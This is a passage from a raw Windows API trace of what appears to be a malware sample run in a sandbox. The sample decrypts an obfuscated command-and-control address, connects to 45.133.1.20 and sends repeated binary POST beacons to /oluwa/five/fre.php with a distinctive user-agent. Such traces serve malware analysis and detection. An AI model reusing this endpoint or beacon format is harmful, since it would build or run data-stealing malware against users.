szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0228.679] GetProcessHeap () returned 0x6a0000 [0228.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0228.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.681] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0228.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.682] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.683] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.683] GetProcessHeap () returned 0x6a0000 [0228.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0228.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.685] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0228.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.686] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0228.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.687] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0228.687] GetProcessHeap () returned 0x6a0000 [0228.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.689] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.690] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.691] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.692] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.692] GetProcessHeap () returned 0x6a0000 [0228.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0228.693] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.693] GetProcessHeap () returned 0x6a0000 [0228.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0228.694] GetProcessHeap () returned 0x6a0000 [0228.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.694] GetProcessHeap () returned 0x6a0000 [0228.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0228.695] GetProcessHeap () returned 0x6a0000 [0228.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0228.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0228.714] GetProcessHeap () returned 0x6a0000 [0228.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0228.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.715] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0228.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.716] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.717] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.717] GetProcessHeap () returned 0x6a0000 [0228.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0228.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.724] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0228.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.725] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0228.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.727] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0228.727] GetProcessHeap () returned 0x6a0000 [0228.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.728] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0228.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.729] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0228.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.730] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0228.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.731] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0228.731] GetProcessHeap () returned 0x6a0000 [0228.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0228.731] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0228.731] GetProcessHeap () returned 0x6a0000 [0228.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0228.732] socket (af=2, type=1, protocol=6) returned 0x6e0 [0228.732] connect (s=0x6e0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0228.761] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0228.761] GetProcessHeap () returned 0x6a0000 [0228.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0228.761] GetProcessHeap () returned 0x6a0000 [0228.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0228.762] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.763] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.763] GetProcessHeap () returned 0x6a0000 [0228.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9000 [0228.763] GetProcessHeap () returned 0x6a0000 [0228.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.763] GetProcessHeap () returned 0x6a0000 [0228.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0228.764] GetProcessHeap () returned 0x6a0000 [0228.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0228.764] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.765] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.765] GetProcessHeap () returned 0x6a0000 [0228.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0228.765] GetProcessHeap () returned 0x6a0000 [0228.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.766] send (s=0x6e0, buf=0x6bd460*, len=242, flags=0) returned 242 [0228.766] send (s=0x6e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0228.766] GetProcessHeap () returned 0x6a0000 [0228.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0228.767] recv (in: s=0x6e0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0228.842] GetProcessHeap () returned 0x6a0000 [0228.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0228.842] GetProcessHeap () returned 0x6a0000 [0228.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0228.844] GetProcessHeap () returned 0x6a0000 [0228.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x6a0000) returned 1 [0228.844] GetProcessHeap () returned 0x6a0000 [0228.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0228.845] closesocket (s=0x6e0) returned 0 [0228.845] GetProcessHeap () returned 0x6a0000 [0228.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0228.845] GetProcessHeap () returned 0x6a0000 [0228.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.846] GetProcessHeap () returned 0x6a0000 [0228.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0228.846] GetProcessHeap () returned 0x6a0000 [0228.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0228.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1408) returned 0x6e0 [0228.849] Sleep (dwMilliseconds=0xea60) [0228.850] GetProcessHeap () returned 0x6a0000 [0228.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0228.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0228.867] GetProcessHeap () returned 0x6a0000 [0228.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0228.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.869] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0228.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.870] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.870] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.870] GetProcessHeap () returned 0x6a0000 [0228.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0228.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.872] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0228.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.876] CryptDestroyKey (hKey=0x6ad020) returned 1 [0228.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.877] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0228.877] GetProcessHeap () returned 0x6a0000 [0228.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.878] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.879] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.880] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.887] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.887] GetProcessHeap () returned 0x6a0000 [0228.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0228.887] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.887] GetProcessHeap () returned 0x6a0000 [0228.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0228.888] GetProcessHeap () returned 0x6a0000 [0228.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0228.888] GetProcessHeap () returned 0x6a0000 [0228.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0228.888] GetProcessHeap () returned 0x6a0000 [0228.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0228.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.889] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.896] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0228.918] GetProcessHeap () returned 0x6a0000 [0228.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0228.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.920] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0228.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.924] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.925] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.926] GetProcessHeap () returned 0x6a0000 [0228.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0228.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.927] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0228.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.929] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0228.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0228.930] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0228.930] GetProcessHeap () returned 0x6a0000 [0228.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0228.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.934] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0228.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.935] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0228.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.937] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0228.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0228.937] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0228.937] GetProcessHeap () returned 0x6a0000 [0228.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0228.938] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0228.938] GetProcessHeap () returned 0x6a0000 [0228.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0228.938] socket (af=2, type=1, protocol=6) returned 0x6e4 [0228.939] connect (s=0x6e4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0228.967] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0228.967] GetProcessHeap () returned 0x6a0000 [0228.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0228.967] GetProcessHeap () returned 0x6a0000 [0228.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0228.968] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.969] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.969] GetProcessHeap () returned 0x6a0000 [0228.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9600 [0228.969] GetProcessHeap () returned 0x6a0000 [0228.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.969] GetProcessHeap () returned 0x6a0000 [0228.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0228.969] GetProcessHeap () returned 0x6a0000 [0228.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0228.970] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0228.971] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.971] GetProcessHeap () returned 0x6a0000 [0228.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0228.971] GetProcessHeap () returned 0x6a0000 [0228.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0228.972] send (s=0x6e4, buf=0x6bd460*, len=242, flags=0) returned 242 [0228.975] send (s=0x6e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0228.975] GetProcessHeap () returned 0x6a0000 [0228.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0228.975] recv (in: s=0x6e4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0229.057] GetProcessHeap () returned 0x6a0000 [0229.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0229.058] GetProcessHeap () returned 0x6a0000 [0229.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0229.059] GetProcessHeap () returned 0x6a0000 [0229.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9600 | out: hHeap=0x6a0000) returned 1 [0229.059] GetProcessHeap () returned 0x6a0000 [0229.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0229.059] closesocket (s=0x6e4) returned 0 [0229.060] GetProcessHeap () returned 0x6a0000 [0229.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0229.060] GetProcessHeap () returned 0x6a0000 [0229.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.061] GetProcessHeap () returned 0x6a0000 [0229.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0229.061] GetProcessHeap () returned 0x6a0000 [0229.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0229.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x140c) returned 0x6e4 [0229.070] Sleep (dwMilliseconds=0xea60) [0229.072] GetProcessHeap () returned 0x6a0000 [0229.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0229.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0229.095] GetProcessHeap () returned 0x6a0000 [0229.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0229.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.096] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0229.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.099] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, 